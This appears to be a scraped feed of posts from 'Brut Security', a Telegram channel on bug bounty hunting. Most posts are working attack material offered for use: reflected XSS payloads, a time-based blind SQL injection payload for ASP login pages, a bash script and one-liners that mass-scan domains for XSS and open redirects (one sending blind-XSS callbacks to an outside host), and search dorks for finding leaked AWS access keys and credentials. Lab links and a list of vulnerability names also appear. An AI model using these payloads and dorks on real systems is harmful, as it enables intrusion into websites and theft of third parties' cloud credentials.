Brut Security
14.8K subscribers
920 photos
73 videos
287 files
976 links
βœ…Queries: @wtf_brut
πŸ›ƒWhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
πŸ“¨E-mail: [email protected]
Download Telegram
πŸ₯°6❀2
πŸ”₯18
Top 3 RXSS payloads

`'";//><img/src=x onError="${x};alert(`1`);">

`'";//><Img Src=a OnError=location=src>

`'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))>
❀6πŸ”₯3❀‍πŸ”₯1πŸ‘1
Simple Reflected XSS
1. subfinder -d target .com | httprobe -c 100 > target.txt
2. cat target.txt | waybackurls | gf xss | kxxs
πŸ₯°7πŸ”₯3
Brut Security
Simple Reflected XSS 1. subfinder -d target .com | httprobe -c 100 > target.txt 2. cat target.txt | waybackurls | gf xss | kxxs
For Automation Reflected XSS Scanning
#!/bin/bash

# Prompt user for domain input
read -p "Enter the domain you want to scan: " domain

# Define output file
output_file="scan_output.txt"

# Run subfinder to find subdomains, filter through httprobe, and save to target.txt
echo "Finding subdomains for $domain..."
subfinder -d $domain | httprobe -c 100 > target.txt

# Use waybackurls to find URLs from Wayback Machine, filter through gf for XSS, and scan with kxxs
echo "Scanning for XSS vulnerabilities..."
cat target.txt | waybackurls | gf xss | kxxs >> "$output_file"

# Display output file location
echo "Scan output saved to $output_file"
πŸ”₯6❀2
🚨Toxicache🚨
πŸ‘‰Golang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
πŸ”—https://lnkd.in/gdtpJGmT
⚑5❀3πŸ”₯2πŸ‘1🌭1
Awesome Bug Bounty One-liners

A collection of awesome one-liner scripts especially for bug bounty.

Open-redirect

Bash
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

Bash
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy https://127.0.0. .1:8080 -sk > /dev/null

XSS
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt

Bash
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

πŸ“š Repositories:
1. https://lnkd.in/dMBdxSQD

2. https://lnkd.in/ebTrAP8y

3. https://lnkd.in/dmG4G3ea

4. https://lnkd.in/dXxHMUu9
πŸ‘10πŸ”₯5
Useful XSS payloads:

"/*\"/*`/*' /*</template> </textarea></noembed></noscript></title> </style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//>

data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTIGJ5IFZpY2tpZScpPC9zY3JpcHQ+"

data:text/html,<script>alert(1)</script>

<select><noembed></select><script x='a@b'a>
❀11πŸ‘4πŸ‘Ž1πŸ”₯1
Cyber Security Lab Practice, RED & BLUE Team.

πŸŒ€Attack-Defense - https://attackdefense.com
πŸŒ€Alert to win - https://aalf.nu/alert1
πŸŒ€Bancocn - https://bancocn.com
πŸŒ€Buffer Overflow Labs - https://lnkd.in/eNbEWYh
πŸŒ€CTF Komodo Security - https://ctf.komodosec.com
πŸŒ€CryptoHack - https://cryptohack.org/
πŸŒ€CMD Challenge - https://cmdchallenge.com
πŸŒ€Explotation Education - https://exploit.education
πŸŒ€Google CTF - https://lnkd.in/e46drbz8
πŸŒ€HackTheBox - Dr. AITH - https://www.hackthebox.com
πŸŒ€Hackthis - https://www.hackthis.co.uk
πŸŒ€Hacksplaining - https://lnkd.in/eAB5CSTA
πŸŒ€Hacker101 - https://ctf.hacker101.com
πŸŒ€Capture The Flag - Hacker Security - https://lnkd.in/ex7R-C-e
πŸŒ€Hacking-Lab - https://hacking-lab.com/
πŸŒ€ImmersiveLabs - https://immersivelabs.com
πŸŒ€NewbieContest - https://lnkd.in/ewBk6fU5
πŸŒ€OverTheWire - https://overthewire.org
πŸŒ€Practical Pentest Labs - https://lnkd.in/esq9Yuv5
πŸŒ€Pentestlab - https://pentesterlab.com
πŸŒ€Penetration Testing Practice Labs - https://lnkd.in/e6wVANYd
πŸŒ€PentestIT LAB - https://lab.pentestit.ru
πŸŒ€PicoCTF - https://picoctf.com
πŸŒ€PWNABLE - https://lnkd.in/eMEwBJzn
πŸŒ€Root-Me - https://www.root-me.org
πŸŒ€Root in Jail - https://rootinjail.com
πŸŒ€SANS Challenger - https://lnkd.in/e5TAMawK
πŸŒ€SmashTheStack - https://lnkd.in/eVn9rP9p
πŸŒ€The Cryptopals Crypto Challenges - https://cryptopals.com
πŸŒ€Try Hack Me - https://tryhackme.com
πŸŒ€Vulnhub - https://www.vulnhub.com
πŸŒ€Vulnmachine - https://lnkd.in/eJ2e_kD
πŸŒ€W3Challs - https://w3challs.com
πŸŒ€WeChall - https://www.wechall.net
πŸŒ€Websploit - https://websploit.org/
πŸŒ€Zenk-Security - https://lnkd.in/ewJ5rNx2
πŸŒ€Cyberdefenders - https://lnkd.in/dVcmjEw8
πŸŒ€LetsDefend- https://letsdefend.io/
❀8πŸ‘2πŸ”₯1
Tricky ASP blind SQL Injection in a login page.
PayloadπŸ‘‡
';%20waitfor%20delay%20'0:0:6'%20--%20
πŸ‘9πŸ”₯8
XSS in the .css URL path

Original url: "target/lib/css/animated.min.css"

XSS Found in:
"/lib/css/animated.min'"/><script%20>alert(document.domain)<%2fscript>.css"
πŸ”₯24πŸ‘3πŸ‘1
Recon like a Boss.pdf
1.3 MB
πŸ”₯11❀4πŸ‘2πŸ‘1
Advanced XSS.pdf
370.6 KB
πŸ‘3πŸ”₯2
AWS OSINT by Dorking

=Shodan Dorks
html:"AWS_ACCESS_KEY_ID"
html:"AWS_SECRET_ACCESS_KEY"
html:"AWS_SESSION_TOKEN"
title:"AWS S3 Explorer"
html:"AWS Elastic Beanstalk overview"
html:"OpenSearch Dashboards"
"X-Amz-Server-Side-Encryption"
title:"EC2 Instance Information"
http.title:"Amazon Cognito Developer Authentication Sample"
"Server: EC2ws"
title:"AWS X-Ray Sample Application"
html:"Amazon EC2 Status"
html:"AWS EC2 Auto Scaling Lab"
html:"istBucketResult"

=Search Engine Dorks
site:.
s3.amazonaws.com "Company"
site:
https://s3.amazonaws.com intitle:index.of.bucket β€œβ€
site:
s3.amazonaws.com "index of /" s3
site:
amazonaws.com filetype:xls password
inurl:gitlab "AWS_SECRET_KEY"
inurl:pastebin "AWS_ACCESS_KEY"
inurl:
s3.amazonaws.com intitle:"AWS S3 Explorer"

=Github Dorks
Key:amazon_secret_access_key
amazonaws
aws_access
aws_access_key_id
aws_bucket aws_key
aws_secret
aws_secret_key
aws_token
bucket_password
bucketeer_aws_access_key_id
bucketeer_aws_secret_access_key
cache_s3_secret_key
cloud_watch_aws_access_key
filename:credentials
aws_access_key_id
filename:s3cfg
lottie_s3_api_key
lottie_s3_secret_key
rds.amazonaws.com password
s3_access_key
s3_access_key_id
s3_key s3_key_app_logs
s3_key_assets
s3_secret_key
sandbox_aws_access_key_id
sandbox_aws_secret_access_key
secret_key
eureka.aws
secretkey
filename:.bash_profile
aws
filename:.s3cfg
πŸ”₯7πŸ‘3
Web LLM Attacks.pdf
3.3 MB
❀2
πŸ–₯ 100 Web Vulnerabilities, categorized into various types : πŸ˜€

⚑ Injection Vulnerabilities:
1. SQL Injection (SQLi)
2. Cross-Site Scripting (XSS)
3. Cross-Site Request Forgery (CSRF)
4. Remote Code Execution (RCE)
5. Command Injection
6. XML Injection
7. LDAP Injection
8. XPath Injection
9. HTML Injection
10. Server-Side Includes (SSI) Injection
11. OS Command Injection
12. Blind SQL Injection
13. Server-Side Template Injection (SSTI)

⚑ Broken Authentication and Session Management:
14. Session Fixation
15. Brute Force Attack
16. Session Hijacking
17. Password Cracking
18. Weak Password Storage
19. Insecure Authentication
20. Cookie Theft
21. Credential Reuse

⚑ Sensitive Data Exposure:
22. Inadequate Encryption
23. Insecure Direct Object References (IDOR)
24. Data Leakage
25. Unencrypted Data Storage
26. Missing Security Headers
27. Insecure File Handling

⚑ Security Misconfiguration:
28. Default Passwords
29. Directory Listing
30. Unprotected API Endpoints
31. Open Ports and Services
32. Improper Access Controls
33. Information Disclosure
34. Unpatched Software
35. Misconfigured CORS
36. HTTP Security Headers Misconfiguration

⚑ XML-Related Vulnerabilities:
37. XML External Entity (XXE) Injection
38. XML Entity Expansion (XEE)
39. XML Bomb

⚑ Broken Access Control:
40. Inadequate Authorization
41. Privilege Escalation
42. Insecure Direct Object References
43. Forceful Browsing
44. Missing Function-Level Access Control

⚑ Insecure Deserialization:
45. Remote Code Execution via Deserialization
46. Data Tampering
47. Object Injection

⚑ API Security Issues:
48. Insecure API Endpoints
49. API Key Exposure
50. Lack of Rate Limiting
51. Inadequate Input Validation

⚑ Insecure Communication:
52. Man-in-the-Middle (MITM) Attack
53. Insufficient Transport Layer Security
54. Insecure SSL/TLS Configuration
55. Insecure Communication Protocols

⚑ Client-Side Vulnerabilities:
56. DOM-based XSS
57. Insecure Cross-Origin Communication
58. Browser Cache Poisoning
59. Clickjacking
60. HTML5 Security Issues

⚑ Denial of Service (DoS):
61. Distributed Denial of Service (DDoS)
62. Application Layer DoS
63. Resource Exhaustion
64. Slowloris Attack
65. XML Denial of Service

⚑ Other Web Vulnerabilities:
66. Server-Side Request Forgery (SSRF)
67. HTTP Parameter Pollution (HPP)
68. Insecure Redirects and Forwards
69. File Inclusion Vulnerabilities
70. Security Header Bypass
71. Clickjacking
72. Inadequate Session Timeout
73. Insufficient Logging and Monitoring
74. Business Logic Vulnerabilities
75. API Abuse

⚑ Mobile Web Vulnerabilities:
76. Insecure Data Storage on Mobile Devices
77. Insecure Data Transmission on Mobile Devices
78. Insecure Mobile API Endpoints
79. Mobile App Reverse Engineering

⚑ IoT Web Vulnerabilities:
80. Insecure IoT Device Management
81. Weak Authentication on IoT Devices
82. IoT Device Vulnerabilities

⚑ Web of Things (WoT) Vulnerabilities:
83. Unauthorized Access to Smart Homes
84. IoT Data Privacy Issues

⚑ Authentication Bypass:
85. Insecure "Remember Me" Functionality
86. CAPTCHA Bypass

⚑ Server-Side Request Forgery (SSRF):
87. Blind SSR
88. Time-Based Blind SSRF

⚑ Content Spoofing:
89. MIME Sniffing
90. X-Content-Type-Options Bypass
91. Content Security Policy (CSP) Bypass

⚑ Business Logic Flaws:
92. Inconsistent Validation
93. Race Conditions
94. Order Processing Vulnerabilities
95. Price Manipulation
96. Account Enumeration
97. User-Based Flaws

⚑ Zero-Day Vulnerabilities:
98. Unknown Vulnerabilities
99. Unpatched Vulnerabilities
100. Day-Zero Exploits
πŸ‘19❀‍πŸ”₯4❀2